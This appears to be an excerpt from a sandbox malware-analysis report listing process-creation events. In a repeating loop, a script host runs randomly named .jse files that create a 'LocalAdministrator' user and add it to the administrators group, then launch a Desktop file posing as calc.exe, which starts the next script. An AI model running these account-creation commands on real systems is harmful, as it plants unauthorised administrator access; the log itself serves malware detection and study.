Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5RDffnTbZa.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xIrKq0jy1l.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" bBF4cMvje3.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xdbrdZA2Mp.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7s3912SDjb.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" dIsc26ydj8.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7G6GlIeRfv.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" AiCGETgrpF.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" FB3eszo6iK.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 90NgPeo2cD.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JEsdrI4PXS.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" argZvAmXhN.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jjzYgN19ls.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" RBRDMGZ065.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ikKn7NiVR4.jse | |